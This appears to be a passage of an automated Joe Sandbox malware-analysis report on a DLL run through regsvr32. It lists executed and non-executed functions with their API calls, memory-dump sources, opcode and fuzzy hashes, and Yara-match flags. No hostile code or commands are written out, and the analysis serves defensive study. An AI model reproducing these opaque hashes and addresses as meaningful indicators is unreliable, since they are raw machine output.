                                                                                                                                                                                      • Part of subcall function 0000000180021220: EncodePointer.KERNEL32(?,?,?,00000001800235A3,?,?,?,000000018001FFD9), ref: 0000000180021275
                                                                                                                                                                                    • FlsAlloc.KERNEL32(?,?,?,000000018001FFD9), ref: 00000001800235B3
                                                                                                                                                                                      • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018001FFD9), ref: 00000001800235E4
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00000001800235F8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 54287522-0
                                                                                                                                                                                    • Opcode ID: 9515a0eb0b270a471e54124f48ee9fd2a9b85e7ee230819a11b93a35135c4a17
                                                                                                                                                                                    • Instruction ID: ee33c46cb241b70e3529a392a1fe48f9641c492e465072bd93d6265023727f4f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9515a0eb0b270a471e54124f48ee9fd2a9b85e7ee230819a11b93a35135c4a17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01447070160D85FBD7AB75A84B3D92795AB4C7F1F14C324B8298A3E5EE28C78D8310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 013C9F3C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115processCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 545 13c9f3c-13ca0ed call 13d144c call 13b89d8 CreateProcessW
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 013B1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_13b1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                    • String ID: c
                                                                                                                                                                                    • API String ID: 963392458-3834304328
                                                                                                                                                                                    • Opcode ID: 68d4fdec304cfb6f8408c3fc39729a7a02d307bdb47bd5c8b632913afc881074
                                                                                                                                                                                    • Instruction ID: 9eb008d486df9be2d441d43388f88af4a3625ce76682646eddf9c96a26be18eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d4fdec304cfb6f8408c3fc39729a7a02d307bdb47bd5c8b632913afc881074
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7341017051C7888FC7B4DF18D48979ABBE0FB88314F204A5EE48DC7255D774A984CB82
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 013CD79C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 550 13cd79c-13cd8e4 call 13d144c call 13b89d8 CreateFileW
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 013B1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_13b1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: v/p
                                                                                                                                                                                    • API String ID: 823142352-3978593441
                                                                                                                                                                                    • Opcode ID: a2f6b58c0a15b1ceae3d906796549a0a8e0fa143b468fe1e695d446d358e3396
                                                                                                                                                                                    • Instruction ID: 1d175d48e09d14620bd336a6896017d513adc8d3f706995f7e7b784a5e80d27e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2f6b58c0a15b1ceae3d906796549a0a8e0fa143b468fe1e695d446d358e3396
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5231057150C7858FC7A4DF18D08479ABBE4FB98314F104A6EE88DD7262DB749885CB87
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000A5B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 555 18000a5b0-18000a5cf call 180004648 ExitProcess
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID: DllRegisterServer
                                                                                                                                                                                    • API String ID: 621844428-1663957109
                                                                                                                                                                                    • Opcode ID: a700413a3a8e58245474342b2b0fe4b447008f8ef2601ffac2d9f67b3abf513e
                                                                                                                                                                                    • Instruction ID: cbcbd52b9743a47eec6da177e7a4d62ed9e09553594e1acfcd2e3beff7085d7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a700413a3a8e58245474342b2b0fe4b447008f8ef2601ffac2d9f67b3abf513e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC04C7562180981D946B7A6EC933C91251A7C93C4F82E411A10D47211DE59C35A4755
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180017E84 Relevance: 3.1, APIs: 2, Instructions: 76threadCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentThread$malloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4095733961-0
                                                                                                                                                                                    • Opcode ID: 54f3c3d4fd8aea113dedf15f5e682120a48575e6fc57a3863662f3ff08195810
                                                                                                                                                                                    • Instruction ID: 68b7d4e0b7a66878a15e4600796ddafaa63b368de66a1a843dd2a0487462e646
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54f3c3d4fd8aea113dedf15f5e682120a48575e6fc57a3863662f3ff08195810
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32310D32211B9881E7929F60E4403DD73E8F708FD4F59863AFA984BB99DF7485A6C350
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002838C Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _errno.LIBCMT ref: 00000001800283AF
                                                                                                                                                                                      • Part of subcall function 0000000180021830: DecodePointer.KERNEL32 ref: 0000000180021857
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,0000000180024CBF,?,?,?,00000001800233AB,?,?,00000018,0000000180020621), ref: 00000001800283F8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 15861996-0
                                                                                                                                                                                    • Opcode ID: 67278d8a8f9952aaa92b90d529845bb27a2b67302801190aa784fc139e3d08f3
                                                                                                                                                                                    • Instruction ID: 58b95d6baf11004c05619311196addc2f5a07f3ea11cdeeaafa13d6bca7c6515
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67278d8a8f9952aaa92b90d529845bb27a2b67302801190aa784fc139e3d08f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C110A3931620886FBD79B20D6447EA63915F8CBD4F18C620BE1547AC5DF7887488300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180004BA4 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 254689257-0
                                                                                                                                                                                    • Opcode ID: 3d95d2160f8be2f55d62b37494c190dae4d07c4db4d468075cdb65c8b01ba6d0
                                                                                                                                                                                    • Instruction ID: dacdb1d2bef65215475a0da95c4002449aec03f8f788513fb972eb1cc3c285d7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d95d2160f8be2f55d62b37494c190dae4d07c4db4d468075cdb65c8b01ba6d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF0823261544D8AE782AF68F9843E57390A34C7C5F59D424E5168A250DE68C6ADC708
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180021220 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _initp_misc_winsig.LIBCMT ref: 0000000180021259
                                                                                                                                                                                      • Part of subcall function 0000000180024AB8: EncodePointer.KERNEL32(?,?,?,?,000000018002126E,?,?,?,00000001800235A3,?,?,?,000000018001FFD9), ref: 0000000180024AC3
                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000001800235A3,?,?,?,000000018001FFD9), ref: 0000000180021275
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190222155-0
                                                                                                                                                                                    • Opcode ID: c70c58eec9442572aaf7ce138cdd31d701da3f52044d28868b0806352d904c10
                                                                                                                                                                                    • Instruction ID: b495901523595971ac4c5b7a334a2c8c9703d383b70c40f218c42ade162dabb5
                                                                                                                                                                                    • Opcode Fuzzy Hash: c70c58eec9442572aaf7ce138cdd31d701da3f52044d28868b0806352d904c10
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0C93078120A84F9CBBBA268233EC13504B9EBC2F48D134B81B0A393DD28835D4344
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180025710 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$CreateInformation
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1774340351-0
                                                                                                                                                                                    • Opcode ID: 300c6d235551350f0d8cdf10b41f17c475b03fbd5aaa03333617a6c5ab019a10
                                                                                                                                                                                    • Instruction ID: 784b2d01bdd3d7ba7a22f93a4f20f06ef484d88972529a4ca31a3925962d2ce7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 300c6d235551350f0d8cdf10b41f17c475b03fbd5aaa03333617a6c5ab019a10
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4E04FB5B21B8486E7DA9B21A88579A6290F78C3C1F80D429BD4942794EF3CC2598B00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180024C20 Relevance: 2.5, APIs: 2, Instructions: 30sleepCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.LIBCMT ref: 0000000180024C3F
                                                                                                                                                                                      • Part of subcall function 0000000180020248: _FF_MSGBANNER.LIBCMT ref: 0000000180020278
                                                                                                                                                                                      • Part of subcall function 0000000180020248: RtlAllocateHeap.NTDLL(?,?,00000018,000000018000B780), ref: 000000018002029D
                                                                                                                                                                                      • Part of subcall function 0000000180020248: _errno.LIBCMT ref: 00000001800202C1
                                                                                                                                                                                      • Part of subcall function 0000000180020248: _errno.LIBCMT ref: 00000001800202CC
                                                                                                                                                                                    • Sleep.KERNEL32(?,?,00000000,0000000180026EF5,?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0), ref: 0000000180024C56
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$AllocateHeapSleepmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275769124-0
                                                                                                                                                                                    • Opcode ID: a1955a77cb1e21b6fde7f5931a08463ce0e10734aeafb2b8c7c802c92fdf8786
                                                                                                                                                                                    • Instruction ID: a02aebb348290ef5a8bf03eee7238cec2e7daf08675decae5a435125a1a36298
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1955a77cb1e21b6fde7f5931a08463ce0e10734aeafb2b8c7c802c92fdf8786
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0C232701B8C86EAC39F16A45039EB360F38CBD0F558624FA6907755CF38CA958B44
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180026FC0 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,0000000180020FFB,?,?,?,000000018002002B), ref: 0000000180026FD9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2118026453-0
                                                                                                                                                                                    • Opcode ID: c7758614ad359a594e6252740f52c294403ee7ff5dfc1de2287e79fa2910b703
                                                                                                                                                                                    • Instruction ID: 7188b21cd9d889a90f021478b422998afb92e364b838a27c26b07507a198384d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7758614ad359a594e6252740f52c294403ee7ff5dfc1de2287e79fa2910b703
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D05B32B50948D2DB824B61F6813992364E7887D4F58C021F64C07655DE38C559C701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180024C8C Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1068366078-0
                                                                                                                                                                                    • Opcode ID: a4039df5c7bb788ce1b2aeed429d17a133b7b9829f15c18ce95c8d25fab38bf4
                                                                                                                                                                                    • Instruction ID: 97f6615a04f59b05780b248bfad082aa119864fecf1bfeb3376bb48d1c8dda9d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a4039df5c7bb788ce1b2aeed429d17a133b7b9829f15c18ce95c8d25fab38bf4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E01A237321A9885EAC78B169450399B7A1F38CFD0F598521FE5907B50CF38DA55C744
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 0000000180017974 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 288libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$ConvertDefault$_errno$Module$AddressHandleProc$EnumFileInfoLanguagesLibraryLoadNameResource_snwprintf_s
                                                                                                                                                                                    • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$LOC$kernel32.dll$ntdll.dll
                                                                                                                                                                                    • API String ID: 1128826395-1766055509
                                                                                                                                                                                    • Opcode ID: a2c583f86b1c59441efa65c9c6c08926d564770091a9f3877bb009d44215ebb7
                                                                                                                                                                                    • Instruction ID: 14556f0ade11b3256e8acaf609371b1d684d8a2afa17d610f672d05ed939cd8b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2c583f86b1c59441efa65c9c6c08926d564770091a9f3877bb009d44215ebb7
                                                                                                                                                                                    • Instruction Fuzzy Hash: AFC16231304A4886E7A69B15E4843EA73B1F78D7E0F518215FA6E537E6DF38CA49CB40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180028614 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                    • API String ID: 921712934-4171548499
                                                                                                                                                                                    • Opcode ID: 7bdc57cbaccb6be89d666d51cd7d056311901b49bcfd0fe0d6e8c0b5e53759c6
                                                                                                                                                                                    • Instruction ID: ec6e5fc4583da7251839c2301bc771804b086fe933b87f1b49480bddc1a02624
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bdc57cbaccb6be89d666d51cd7d056311901b49bcfd0fe0d6e8c0b5e53759c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9112273621564986EBA38F25D0443EAB7A0FB8C7C8F59C116FA8943A95DF3DC64DDB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180029A44 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE
